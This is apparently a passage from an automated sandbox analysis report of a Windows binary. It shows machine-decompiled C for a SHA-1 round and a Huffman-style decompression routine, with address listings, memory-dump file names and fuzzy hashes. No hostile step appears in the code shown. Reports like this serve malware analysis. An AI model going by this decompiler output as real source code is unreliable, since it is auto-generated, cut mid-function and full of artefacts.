					_t825 =  *(_t881 + (_t555 - 0x00000004 & _t821) * 4) ^  *(_t881 + (_t555 + 0x00000001 & _t821) * 4) ^  *(_t881 + _t904 * 4) ^  *(_t881 + _t847 * 4);
					asm("rol edx, 1");
					 *(_t881 + _t904 * 4) = _t825;
					_t882 = _a12;
					asm("rol ecx, 0x5");
					_a16 = (_a8 ^ _v28 ^ _t882) + _t825 + _a16 + _v24 + 0xca62c1d6;
					_t564 = _v16;
					asm("ror esi, 0x2");
					_a12 = _t882;
					_t884 = _t564 + 0x00000007 & 0x0000000f;
					_t741 = _v20;
					_t830 = _v20[_t564 - 0x00000003 & 0x0000000f] ^  *(_t741 + (_t564 + 0x00000002 & 0x0000000f) * 4) ^  *(_t741 + _t603 * 4) ^  *(_t741 + _t884 * 4);
					asm("rol edx, 1");
					 *(_t741 + _t603 * 4) = _t830;
					_t604 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t604;
					_t605 = _v20;
					_a8 = (_t604 ^ _v28 ^ _a12) + _t830 + _a8 + _a16 + 0xca62c1d6;
					asm("rol ecx, 0x5");
					_t834 = _t605[_v16 - 0x00000008 & 0x0000000f] ^ _t605[_v16 + 0xfffffffe & 0x0000000f] ^ _t605[_t847] ^ _t605[_v4];
					asm("rol edx, 1");
					_t605[_t847] = _t834;
					_t845 = _v24;
					asm("ror dword [esp+0x3c], 0x2");
					_v28 = (_t845 ^ _a16 ^ _a12) + _t834 + _v28 + _a8 + 0xca62c1d6;
					_t838 = _t605[_v16 - 0x00000007 & 0x0000000f] ^ _t605[_v16 - 0x00000001 & 0x0000000f] ^ _t605[_t904] ^ _t605[_t884];
					_t905 = _a8;
					asm("rol edx, 1");
					_t605[_t884] = _t838;
					_t606 = _a16;
					_t885 = _v28;
					asm("ror ebp, 0x2");
					_t816 = _v8;
					asm("rol ecx, 0x5");
					_a8 = _t905;
					_t752 = _t885 + 0xca62c1d6 + (_t845 ^ _t606 ^ _t905) + _t838 + _a12;
					_v16 = _t816;
					_a12 = _t752;
				} while (_t816 + 3 <= 0x4b);
				_t592 = _a4;
				_t592[1] = _t592[1] + _t885;
				_t592[2] = _t592[2] + _t905;
				_t592[3] = _t592[3] + _t606;
				 *_t592 =  *_t592 + _t752;
				_t592[4] = _t592[4] + _t845;
				return _t592;
			}










































































































                            0x009ee973
                            0x009ee97f
                            0x009ee98b
                            0x009ee995
                            0x009ee99a
                            0x009ee99f
                            0x009ee981
                            0x009ee981
                            0x009ee985
                            0x009ee985
                            0x009ee9a2
                            0x009ee9ab
                            0x009ee9ad
                            0x009ee9b0
                            0x009ee9ba
                            0x009ee9c0
                            0x009ee9c4
                            0x009ee9dc
                            0x009ee9e7
                            0x009ee9e9
                            0x009ee9eb
                            0x009ee9f0
                            0x009ee9f3
                            0x009ee9f7
                            0x009ee9fb
                            0x009ee9fe
                            0x009eea09
                            0x009eea0e
                            0x009eea28
                            0x009eea2d
                            0x009eea38
                            0x009eea45
                            0x009eea4a
                            0x009eea5e
                            0x009eea65
                            0x009eea6f
                            0x009eea7c
                            0x009eea85
                            0x009eea95
                            0x009eeaa1
                            0x009eeaa3
                            0x009eeaae
                            0x009eeab3
                            0x009eeab6
                            0x009eeaca
                            0x009eead1
                            0x009eead8
                            0x009eeae1
                            0x009eeae5
                            0x009eeae9
                            0x009eeaf4
                            0x009eeaf7
                            0x009eeafa
                            0x009eeb06
                            0x009eeb18
                            0x009eeb1b
                            0x009eeb1d
                            0x009eeb33
                            0x009eeb3b
                            0x009eeb3f
                            0x009eeb4a
                            0x009eeb5c
                            0x009eeb63
                            0x009eeb66
                            0x009eeb6c
                            0x009eeb6e
                            0x009eeb73
                            0x009eeb78
                            0x009eeb8e
                            0x009eeb97
                            0x009eeb99
                            0x009eeb9c
                            0x009eeba2
                            0x009eeba8
                            0x009eebb7
                            0x009eebc7
                            0x009eebc9
                            0x009eebcf
                            0x009eebd1
                            0x009eebd7
                            0x009eebdc
                            0x009eebe0
                            0x009eebe6
                            0x009eebea
                            0x009eebf4
                            0x009eebfb
                            0x009eec00
                            0x009eec01
                            0x009eec05
                            0x009eec09
                            0x009eec0d
                            0x009eec0d
                            0x009eec0d
                            0x009eec12
                            0x009eec16
                            0x009eec1e
                            0x009eec24
                            0x009eec27
                            0x009eec2a
                            0x009eec39
                            0x009eec48
                            0x009eec4a
                            0x009eec4d
                            0x009eec53
                            0x009eec5d
                            0x009eec62
                            0x009eec68
                            0x009eec6c
                            0x009eec70
                            0x009eec74
                            0x009eec78
                            0x009eec7d
                            0x009eec90
                            0x009eec9f
                            0x009eeca1
                            0x009eeca4
                            0x009eecaa
                            0x009eecaf
                            0x009eecc2
                            0x009eecc8
                            0x009eeccc
                            0x009eecdc
                            0x009eece5
                            0x009eecef
                            0x009eecf2
                            0x009eecf4
                            0x009eecfb
                            0x009eed01
                            0x009eed10
                            0x009eed1d
                            0x009eed23
                            0x009eed2b
                            0x009eed4c
                            0x009eed4f
                            0x009eed56
                            0x009eed5a
                            0x009eed5d
                            0x009eed67
                            0x009eed77
                            0x009eed7c
                            0x009eed84
                            0x009eed9b
                            0x009eeda2
                            0x009eeda6
                            0x009eeda8
                            0x009eedab
                            0x009eedb1
                            0x009eedba
                            0x009eedca
                            0x009eedcf
                            0x009eedd6
                            0x009eedda
                            0x009eedde
                            0x009eede9
                            0x009eedea
                            0x009eedf4
                            0x009eedf4
                            0x009eedf4
                            0x009eedf7
                            0x009eedfa
                            0x009eee01
                            0x009eee06
                            0x009eee0b
                            0x009eee12
                            0x009eee20
                            0x009eee2f
                            0x009eee31
                            0x009eee37
                            0x009eee46
                            0x009eee49
                            0x009eee4c
                            0x009eee4d
                            0x009eee59
                            0x009eee5d
                            0x009eee67
                            0x009eee69
                            0x009eee70
                            0x009eee80
                            0x009eee89
                            0x009eee8b
                            0x009eee8e
                            0x009eee9a
                            0x009eeea2
                            0x009eeea9
                            0x009eeeac
                            0x009eeeb0
                            0x009eeeb6
                            0x009eeebc
                            0x009eeec0
                            0x009eeed0
                            0x009eeedf
                            0x009eeee2
                            0x009eeee4
                            0x009eeee7
                            0x009eef0b
                            0x009eef14
                            0x009eef17
                            0x009eef19
                            0x009eef1d
                            0x009eef27
                            0x009eef2e
                            0x009eef44
                            0x009eef4e
                            0x009eef50
                            0x009eef54
                            0x009eef62
                            0x009eef71
                            0x009eef79
                            0x009eef7e
                            0x009eef85
                            0x009eef9e
                            0x009eefa4
                            0x009eefa6
                            0x009eefaa
                            0x009eefb0
                            0x009eefb8
                            0x009eefbd
                            0x009eefcd
                            0x009eefd3
                            0x009eefd7
                            0x009eefe1
                            0x00000000
                            0x00000000
                            0x009eedf0
                            0x009eedf0
                            0x009eefe9
                            0x009eefea
                            0x009eefee
                            0x009eefee
                            0x009eefee
                            0x009eeff3
                            0x009eeff7
                            0x009eeffc
                            0x009ef001
                            0x009ef006
                            0x009ef008
                            0x009ef00a
                            0x009ef00e
                            0x009ef01d
                            0x009ef02c
                            0x009ef02e
                            0x009ef031
                            0x009ef039
                            0x009ef03e
                            0x009ef047
                            0x009ef04d
                            0x009ef051
                            0x009ef055
                            0x009ef05c
                            0x009ef05e
                            0x009ef071
                            0x009ef080
                            0x009ef082
                            0x009ef085
                            0x009ef08d
                            0x009ef0a0
                            0x009ef0a4
                            0x009ef0a8
                            0x009ef0ab
                            0x009ef0bb
                            0x009ef0c4
                            0x009ef0ce
                            0x009ef0d1
                            0x009ef0d3
                            0x009ef0da
                            0x009ef0de
                            0x009ef0f3
                            0x009ef0fc
                            0x009ef100
                            0x009ef104
                            0x009ef129
                            0x009ef132
                            0x009ef135
                            0x009ef137
                            0x009ef13a
                            0x009ef148
                            0x009ef155
                            0x009ef172
                            0x009ef175
                            0x009ef179
                            0x009ef17b
                            0x009ef17e
                            0x009ef184
                            0x009ef18c
                            0x009ef195
                            0x009ef199
                            0x009ef1a2
                            0x009ef1a6
                            0x009ef1a8
                            0x009ef1af
                            0x009ef1b3
                            0x009ef1bc
                            0x009ef1c0
                            0x009ef1c3
                            0x009ef1c6
                            0x009ef1c9
                            0x009ef1cb
                            0x009ef1d5

                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 21433a5f7de97874b167784364e9de3bea179284053d1adb041105bdc07d2dba
                            • Instruction ID: d5075517c0188f0e2431270a3b36e398ebf83e5cb6a94ce50d696d2bcf40c0b4
                            • Opcode Fuzzy Hash: 21433a5f7de97874b167784364e9de3bea179284053d1adb041105bdc07d2dba
                            • Instruction Fuzzy Hash: 3B5249B2A087019FC758CF19C891A6AF7E1FFC8304F49992DF5868B255D734E919CB82
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F66A2, Relevance: .5, Instructions: 509COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 88%
                            			E009F66A2(signed int __ecx) {
				void* __ebp;
				signed int _t201;
				signed int _t203;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t209;
				signed int _t210;
				signed int _t212;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int _t218;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				unsigned int _t223;
				signed int _t233;
				signed int _t237;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t244;
				signed int _t245;
				signed short _t246;
				signed int _t247;
				signed int _t250;
				signed int* _t251;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				unsigned int _t256;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t264;
				signed short _t265;
				unsigned int _t269;
				unsigned int _t274;
				signed int _t279;
				signed short _t280;
				signed int _t284;
				void* _t291;
				signed int _t293;
				signed int* _t295;
				signed int _t296;
				signed int _t297;
				signed int _t301;
				signed int _t304;
				signed int _t305;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t313;
				intOrPtr _t314;
				signed int _t315;
				unsigned int _t318;
				void* _t320;
				signed int _t323;
				signed int _t324;
				unsigned int _t327;
				void* _t329;
				signed int _t332;
				void* _t335;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t341;
				void* _t342;
				signed int _t345;
				signed int* _t349;
				signed int _t350;
				unsigned int _t354;
				void* _t356;
				signed int _t359;
				void* _t363;
				signed int _t366;
				signed int _t367;
				unsigned int _t370;
				void* _t372;
				signed int _t375;
				intOrPtr* _t377;
				void* _t378;
				signed int _t381;
				void* _t384;
				signed int _t388;
				signed int _t389;
				intOrPtr* _t391;
				void* _t392;
				signed int _t395;
				void* _t398;
				signed int _t401;
				signed int _t402;
				intOrPtr* _t404;
				void* _t405;
				signed int _t408;
				signed int _t414;
				unsigned int _t416;
				unsigned int _t420;
				signed int _t423;
				signed int _t424;
				unsigned int _t426;
				unsigned int _t430;
				signed int _t433;
				signed int _t434;
				void* _t435;
				signed int _t436;
				intOrPtr* _t438;
				signed char _t440;
				signed int _t442;
				intOrPtr _t443;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				void* _t455;

				_t440 =  *(_t455 + 0x34);
				 *(_t455 + 0x14) = __ecx;
				if( *((char*)(_t440 + 0x2c)) != 0) {
					L3:
					_t313 =  *((intOrPtr*)(_t440 + 0x18));
					_t438 = _t440 + 4;
					__eflags =  *_t438 -  *((intOrPtr*)(_t440 + 0x24)) + _t313;
					if( *_t438 <=  *((intOrPtr*)(_t440 + 0x24)) + _t313) {
						 *(_t440 + 0x4ad8) =  *(_t440 + 0x4ad8) & 0x00000000;
						_t201 =  *((intOrPtr*)(_t440 + 0x20)) - 1 + _t313;
						_t414 =  *((intOrPtr*)(_t440 + 0x4acc)) - 0x10;
						 *(_t455 + 0x14) = _t201;
						 *(_t455 + 0x10) = _t414;
						_t293 = _t201;
						__eflags = _t201 - _t414;
						if(_t201 >= _t414) {
							_t293 = _t414;
						}
						 *(_t455 + 0x3c) = _t293;
						while(1) {
							_t314 =  *_t438;
							__eflags = _t314 - _t293;
							if(_t314 < _t293) {
								goto L15;
							}
							L9:
							__eflags = _t314 - _t201;
							if(__eflags > 0) {
								L93:
								L94:
								return _t201;
							}
							if(__eflags != 0) {
								L12:
								__eflags = _t314 - _t414;
								if(_t314 < _t414) {
									L14:
									__eflags = _t314 -  *((intOrPtr*)(_t440 + 0x4acc));
									if(_t314 >=  *((intOrPtr*)(_t440 + 0x4acc))) {
										L92:
										 *((char*)(_t440 + 0x4ad3)) = 1;
										goto L93;
									}
									goto L15;
								}
								__eflags =  *((char*)(_t440 + 0x4ad2));
								if( *((char*)(_t440 + 0x4ad2)) == 0) {
									goto L92;
								}
								goto L14;
							}
							_t201 =  *(_t440 + 8);
							__eflags = _t201 -  *((intOrPtr*)(_t440 + 0x1c));
							if(_t201 >=  *((intOrPtr*)(_t440 + 0x1c))) {
								goto L93;
							}
							goto L12;
							L15:
							_t315 =  *(_t440 + 0x4adc);
							__eflags =  *(_t440 + 0x4ad8) - _t315 - 8;
							if( *(_t440 + 0x4ad8) > _t315 - 8) {
								_t284 = _t315 + _t315;
								 *(_t440 + 0x4adc) = _t284;
								_push(_t284 * 0xc);
								_push( *(_t440 + 0x4ad4));
								_t310 = E00A02B5E(_t315, _t414);
								__eflags = _t310;
								if(_t310 == 0) {
									E009E6D3A(0xa200e0);
								}
								 *(_t440 + 0x4ad4) = _t310;
							}
							_t203 =  *(_t440 + 0x4ad8);
							_t295 = _t203 * 0xc +  *(_t440 + 0x4ad4);
							 *(_t455 + 0x24) = _t295;
							 *(_t440 + 0x4ad8) = _t203 + 1;
							_t205 = E009EA4ED(_t438);
							_t206 =  *(_t440 + 0xb4);
							_t416 = _t205 & 0x0000fffe;
							__eflags = _t416 -  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4));
							if(_t416 >=  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4))) {
								_t442 = 0xf;
								_t207 = _t206 + 1;
								__eflags = _t207 - _t442;
								if(_t207 >= _t442) {
									L27:
									_t318 =  *(_t438 + 4) + _t442;
									 *(_t438 + 4) = _t318 & 0x00000007;
									_t209 = _t318 >> 3;
									 *_t438 =  *_t438 + _t209;
									_t320 = 0x10;
									_t443 =  *((intOrPtr*)(_t455 + 0x1c));
									_t323 =  *((intOrPtr*)(_t440 + 0x74 + _t442 * 4)) + (_t416 -  *((intOrPtr*)(_t440 + 0x30 + _t442 * 4)) >> _t320 - _t442);
									__eflags = _t323 -  *((intOrPtr*)(_t440 + 0x30));
									asm("sbb eax, eax");
									_t210 = _t209 & _t323;
									__eflags = _t210;
									_t324 =  *(_t440 + 0xcb8 + _t210 * 2) & 0x0000ffff;
									goto L28;
								}
								_t404 = _t440 + 0x34 + _t207 * 4;
								while(1) {
									__eflags = _t416 -  *_t404;
									if(_t416 <  *_t404) {
										break;
									}
									_t207 = _t207 + 1;
									_t404 = _t404 + 4;
									__eflags = _t207 - 0xf;
									if(_t207 < 0xf) {
										continue;
									}
									goto L27;
								}
								_t442 = _t207;
								goto L27;
							} else {
								_t405 = 0x10;
								_t436 = _t416 >> _t405 - _t206;
								_t408 = ( *(_t436 + _t440 + 0xb8) & 0x000000ff) +  *(_t438 + 4);
								 *_t438 =  *_t438 + (_t408 >> 3);
								 *(_t438 + 4) = _t408 & 0x00000007;
								_t324 =  *(_t440 + 0x4b8 + _t436 * 2) & 0x0000ffff;
								L28:
								__eflags = _t324 - 0x100;
								if(_t324 >= 0x100) {
									__eflags = _t324 - 0x106;
									if(_t324 < 0x106) {
										__eflags = _t324 - 0x100;
										if(_t324 != 0x100) {
											__eflags = _t324 - 0x101;
											if(_t324 != 0x101) {
												_t212 = 3;
												 *_t295 = _t212;
												_t295[2] = _t324 - 0x102;
												_t214 = E009EA4ED(_t438);
												_t215 =  *(_t440 + 0x2d78);
												_t420 = _t214 & 0x0000fffe;
												__eflags = _t420 -  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4));
												if(_t420 >=  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4))) {
													_t296 = 0xf;
													_t216 = _t215 + 1;
													__eflags = _t216 - _t296;
													if(_t216 >= _t296) {
														L85:
														_t327 =  *(_t438 + 4) + _t296;
														 *(_t438 + 4) = _t327 & 0x00000007;
														_t218 = _t327 >> 3;
														 *_t438 =  *_t438 + _t218;
														_t329 = 0x10;
														_t332 =  *((intOrPtr*)(_t440 + 0x2d38 + _t296 * 4)) + (_t420 -  *((intOrPtr*)(_t440 + 0x2cf4 + _t296 * 4)) >> _t329 - _t296);
														__eflags = _t332 -  *((intOrPtr*)(_t440 + 0x2cf4));
														asm("sbb eax, eax");
														_t219 = _t218 & _t332;
														__eflags = _t219;
														_t220 =  *(_t440 + 0x397c + _t219 * 2) & 0x0000ffff;
														L86:
														_t297 = _t220 & 0x0000ffff;
														__eflags = _t297 - 8;
														if(_t297 >= 8) {
															_t221 = 3;
															_t446 = (_t297 >> 2) - 1;
															_t301 = ((_t297 & _t221 | 0x00000004) << _t446) + 2;
															__eflags = _t446;
															if(_t446 != 0) {
																_t223 = E009EA4ED(_t438);
																_t335 = 0x10;
																_t301 = _t301 + (_t223 >> _t335 - _t446);
																_t338 =  *(_t438 + 4) + _t446;
																 *_t438 =  *_t438 + (_t338 >> 3);
																_t339 = _t338 & 0x00000007;
																__eflags = _t339;
																 *(_t438 + 4) = _t339;
															}
														} else {
															_t301 = _t297 + 2;
														}
														( *(_t455 + 0x24))[1] = _t301;
														L91:
														_t414 =  *(_t455 + 0x14);
														_t201 =  *(_t455 + 0x18);
														_t293 =  *(_t455 + 0x3c);
														_t443 =  *((intOrPtr*)(_t455 + 0x1c));
														while(1) {
															_t314 =  *_t438;
															__eflags = _t314 - _t293;
															if(_t314 < _t293) {
																goto L15;
															}
															goto L9;
														}
													}
													_t341 = _t440 + 0x2cf8 + _t216 * 4;
													while(1) {
														__eflags = _t420 -  *_t341;
														if(_t420 <  *_t341) {
															break;
														}
														_t216 = _t216 + 1;
														_t341 = _t341 + 4;
														__eflags = _t216 - 0xf;
														if(_t216 < 0xf) {
															continue;
														}
														goto L85;
													}
													_t296 = _t216;
													goto L85;
												}
												_t342 = 0x10;
												_t423 = _t420 >> _t342 - _t215;
												_t345 = ( *(_t423 + _t440 + 0x2d7c) & 0x000000ff) +  *(_t438 + 4);
												 *_t438 =  *_t438 + (_t345 >> 3);
												 *(_t438 + 4) = _t345 & 0x00000007;
												_t220 =  *(_t440 + 0x317c + _t423 * 2) & 0x0000ffff;
												goto L86;
											}
											 *_t295 = 2;
											L33:
											_t414 =  *(_t455 + 0x14);
											_t201 =  *(_t455 + 0x18);
											_t293 =  *(_t455 + 0x3c);
											continue;
										}
										_push(_t455 + 0x28);
										E009F3564(_t443, _t438);
										_t295[1] =  *(_t455 + 0x28) & 0x000000ff;
										_t295[2] =  *(_t455 + 0x2c);
										_t424 = 4;
										 *_t295 = _t424;
										_t233 =  *(_t440 + 0x4ad8);
										_t349 = _t233 * 0xc +  *(_t440 + 0x4ad4);
										 *(_t440 + 0x4ad8) = _t233 + 1;
										_t349[1] =  *(_t455 + 0x34) & 0x000000ff;
										 *_t349 = _t424;
										_t349[2] =  *(_t455 + 0x30);
										goto L33;
									}
									_t237 = _t324 - 0x106;
									__eflags = _t237 - 8;
									if(_t237 >= 8) {
										_t350 = 3;
										_t304 = (_t237 >> 2) - 1;
										_t237 = (_t237 & _t350 | 0x00000004) << _t304;
										__eflags = _t237;
									} else {
										_t304 = 0;
									}
									_t447 = _t237 + 2;
									 *(_t455 + 0x10) = _t447;
									__eflags = _t304;
									if(_t304 != 0) {
										_t274 = E009EA4ED(_t438);
										_t398 = 0x10;
										_t401 =  *(_t438 + 4) + _t304;
										 *(_t455 + 0x10) = _t447 + (_t274 >> _t398 - _t304);
										 *_t438 =  *_t438 + (_t401 >> 3);
										_t402 = _t401 & 0x00000007;
										__eflags = _t402;
										 *(_t438 + 4) = _t402;
									}
									_t240 = E009EA4ED(_t438);
									_t241 =  *(_t440 + 0xfa0);
									_t426 = _t240 & 0x0000fffe;
									__eflags = _t426 -  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4));
									if(_t426 >=  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4))) {
										_t305 = 0xf;
										_t242 = _t241 + 1;
										__eflags = _t242 - _t305;
										if(_t242 >= _t305) {
											L49:
											_t354 =  *(_t438 + 4) + _t305;
											 *(_t438 + 4) = _t354 & 0x00000007;
											_t244 = _t354 >> 3;
											 *_t438 =  *_t438 + _t244;
											_t356 = 0x10;
											_t359 =  *((intOrPtr*)(_t440 + 0xf60 + _t305 * 4)) + (_t426 -  *((intOrPtr*)(_t440 + 0xf1c + _t305 * 4)) >> _t356 - _t305);
											__eflags = _t359 -  *((intOrPtr*)(_t440 + 0xf1c));
											asm("sbb eax, eax");
											_t245 = _t244 & _t359;
											__eflags = _t245;
											_t246 =  *(_t440 + 0x1ba4 + _t245 * 2) & 0x0000ffff;
											goto L50;
										}
										_t391 = _t440 + 0xf20 + _t242 * 4;
										while(1) {
											__eflags = _t426 -  *_t391;
											if(_t426 <  *_t391) {
												break;
											}
											_t242 = _t242 + 1;
											_t391 = _t391 + 4;
											__eflags = _t242 - 0xf;
											if(_t242 < 0xf) {
												continue;
											}
											goto L49;
										}
										_t305 = _t242;
										goto L49;
									} else {
										_t392 = 0x10;
										_t434 = _t426 >> _t392 - _t241;
										_t395 = ( *(_t434 + _t440 + 0xfa4) & 0x000000ff) +  *(_t438 + 4);
										 *_t438 =  *_t438 + (_t395 >> 3);
										 *(_t438 + 4) = _t395 & 0x00000007;
										_t246 =  *(_t440 + 0x13a4 + _t434 * 2) & 0x0000ffff;
										L50:
										_t247 = _t246 & 0x0000ffff;
										__eflags = _t247 - 4;
										if(_t247 >= 4) {
											_t308 = (_t247 >> 1) - 1;
											_t247 = (_t247 & 0x00000001 | 0x00000002) << _t308;
											__eflags = _t247;
										} else {
											_t308 = 0;
										}
										_t250 = _t247 + 1;
										 *(_t455 + 0x20) = _t250;
										_t448 = _t250;
										__eflags = _t308;
										if(_t308 == 0) {
											L68:
											__eflags = _t448 - 0x100;
											if(_t448 > 0x100) {
												_t253 =  *(_t455 + 0x10) + 1;
												 *(_t455 + 0x10) = _t253;
												__eflags = _t448 - 0x2000;
												if(_t448 > 0x2000) {
													_t254 = _t253 + 1;
													 *(_t455 + 0x10) = _t254;
													__eflags = _t448 - 0x40000;
													if(_t448 > 0x40000) {
														_t255 = _t254 + 1;
														__eflags = _t255;
														 *(_t455 + 0x10) = _t255;
													}
												}
											}
											_t251 =  *(_t455 + 0x24);
											 *_t251 = 1;
											_t251[1] =  *(_t455 + 0x10);
											_t251[2] = _t448;
											goto L91;
										} else {
											__eflags = _t308 - 4;
											if(__eflags < 0) {
												_t256 = E009F7D76(_t438);
												_t363 = 0x20;
												_t448 = (_t256 >> _t363 - _t308) +  *(_t455 + 0x20);
												_t366 =  *(_t438 + 4) + _t308;
												 *_t438 =  *_t438 + (_t366 >> 3);
												_t367 = _t366 & 0x00000007;
												__eflags = _t367;
												 *(_t438 + 4) = _t367;
												goto L68;
											}
											if(__eflags > 0) {
												_t269 = E009F7D76(_t438);
												_t384 = 0x24;
												_t448 = (_t269 >> _t384 - _t308 << 4) +  *(_t455 + 0x20);
												_t388 =  *(_t438 + 4) + 0xfffffffc + _t308;
												 *_t438 =  *_t438 + (_t388 >> 3);
												_t389 = _t388 & 0x00000007;
												__eflags = _t389;
												 *(_t438 + 4) = _t389;
											}
											_t259 = E009EA4ED(_t438);
											_t260 =  *(_t440 + 0x1e8c);
											_t430 = _t259 & 0x0000fffe;
											__eflags = _t430 -  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4));
											if(_t430 >=  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4))) {
												_t309 = 0xf;
												_t261 = _t260 + 1;
												__eflags = _t261 - _t309;
												if(_t261 >= _t309) {
													L65:
													_t370 =  *(_t438 + 4) + _t309;
													 *(_t438 + 4) = _t370 & 0x00000007;
													_t263 = _t370 >> 3;
													 *_t438 =  *_t438 + _t263;
													_t372 = 0x10;
													_t375 =  *((intOrPtr*)(_t440 + 0x1e4c + _t309 * 4)) + (_t430 -  *((intOrPtr*)(_t440 + 0x1e08 + _t309 * 4)) >> _t372 - _t309);
													__eflags = _t375 -  *((intOrPtr*)(_t440 + 0x1e08));
													asm("sbb eax, eax");
													_t264 = _t263 & _t375;
													__eflags = _t264;
													_t265 =  *(_t440 + 0x2a90 + _t264 * 2) & 0x0000ffff;
													goto L66;
												}
												_t377 = _t440 + 0x1e0c + _t261 * 4;
												while(1) {
													__eflags = _t430 -  *_t377;
													if(_t430 <  *_t377) {
														break;
													}
													_t261 = _t261 + 1;
													_t377 = _t377 + 4;
													__eflags = _t261 - 0xf;
													if(_t261 < 0xf) {
														continue;
													}
													goto L65;
												}
												_t309 = _t261;
												goto L65;
											} else {
												_t378 = 0x10;
												_t433 = _t430 >> _t378 - _t260;
												_t381 = ( *(_t433 + _t440 + 0x1e90) & 0x000000ff) +  *(_t438 + 4);
												 *_t438 =  *_t438 + (_t381 >> 3);
												 *(_t438 + 4) = _t381 & 0x00000007;
												_t265 =  *(_t440 + 0x2290 + _t433 * 2) & 0x0000ffff;
												L66:
												_t448 = _t448 + (_t265 & 0x0000ffff);
												goto L68;
											}
										}
									}
								}
								__eflags =  *(_t440 + 0x4ad8) - 1;
								if( *(_t440 + 0x4ad8) <= 1) {
									L34:
									 *_t295 =  *_t295 & 0x00000000;
									_t295[2] = _t324;
									_t295[1] = 0;
									goto L33;
								}
								__eflags =  *(_t295 - 0xc);
								if( *(_t295 - 0xc) != 0) {
									goto L34;
								}
								_t279 =  *(_t295 - 8) & 0x0000ffff;
								_t435 = 3;
								__eflags = _t279 - _t435;
								if(_t279 >= _t435) {
									goto L34;
								}
								_t280 = _t279 + 1;
								 *(_t295 - 8) = _t280;
								 *((_t280 & 0x0000ffff) + _t295 - 4) = _t324;
								_t68 = _t440 + 0x4ad8;
								 *_t68 =  *(_t440 + 0x4ad8) - 1;
								__eflags =  *_t68;
								goto L33;
							}
						}
					}
					 *((char*)(_t440 + 0x4ad0)) = 1;
					goto L94;
				} else {
					 *((char*)(_t440 + 0x2c)) = 1;
					_push(_t440 + 0x30);
					_push(_t440 + 0x18);
					_push(_t440 + 4);
					_t291 = E009F397F(__ecx);
					if(_t291 != 0) {
						goto L3;
					} else {
						 *((char*)(_t440 + 0x4ad0)) = 1;
						return _t291;
					}
				}
			}






















































































































                            0x009f66a7
                            0x009f66ad
                            0x009f66b5
                            0x009f66dc
                            0x009f66df
                            0x009f66e5
                            0x009f66e8
                            0x009f66ea
                            0x009f6702
                            0x009f6709
                            0x009f670b
                            0x009f670e
                            0x009f6712
                            0x009f6717
                            0x009f6719
                            0x009f671b
                            0x009f671d
                            0x009f671d
                            0x009f671f
                            0x009f6723
                            0x009f6723
                            0x009f6725
                            0x009f6727
                            0x00000000
                            0x00000000
                            0x009f6729
                            0x009f6729
                            0x009f672b
                            0x009f6ca2
                            0x009f6ca3
                            0x00000000
                            0x009f6ca3
                            0x009f6731
                            0x009f673f
                            0x009f673f
                            0x009f6741
                            0x009f6750
                            0x009f6750
                            0x009f6756
                            0x009f6c9b
                            0x009f6c9b
                            0x00000000
                            0x009f6c9b
                            0x00000000
                            0x009f6756
                            0x009f6743
                            0x009f674a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f674a
                            0x009f6733
                            0x009f6736
                            0x009f6739
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f675c
                            0x009f675c
                            0x009f6765
                            0x009f676b
                            0x009f676d
                            0x009f6770
                            0x009f6779
                            0x009f677a
                            0x009f6785
                            0x009f6789
                            0x009f678b
                            0x009f6792
                            0x009f6792
                            0x009f6797
                            0x009f6797
                            0x009f679d
                            0x009f67a8
                            0x009f67af
                            0x009f67b3
                            0x009f67b9
                            0x009f67c0
                            0x009f67c6
                            0x009f67cc
                            0x009f67d0
                            0x009f67fd
                            0x009f67fe
                            0x009f67ff
                            0x009f6801
                            0x009f681a
                            0x009f681d
                            0x009f6824
                            0x009f6827
                            0x009f682a
                            0x009f6832
                            0x009f683b
                            0x009f683f
                            0x009f6841
                            0x009f6844
                            0x009f6846
                            0x009f6846
                            0x009f6848
                            0x00000000
                            0x009f6848
                            0x009f6806
                            0x009f6809
                            0x009f6809
                            0x009f680b
                            0x00000000
                            0x00000000
                            0x009f680d
                            0x009f680e
                            0x009f6811
                            0x009f6814
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f6816
                            0x009f6818
                            0x00000000
                            0x009f67d2
                            0x009f67d4
                            0x009f67d7
                            0x009f67e1
                            0x009f67e9
                            0x009f67ee
                            0x009f67f1
                            0x009f6850
                            0x009f6855
                            0x009f6857
                            0x009f68a5
                            0x009f68ab
                            0x009f6b1e
                            0x009f6b20
                            0x009f6b71
                            0x009f6b77
                            0x009f6b86
                            0x009f6b87
                            0x009f6b91
                            0x009f6b94
                            0x009f6b9b
                            0x009f6ba1
                            0x009f6ba7
                            0x009f6bae
                            0x009f6bdb
                            0x009f6bdc
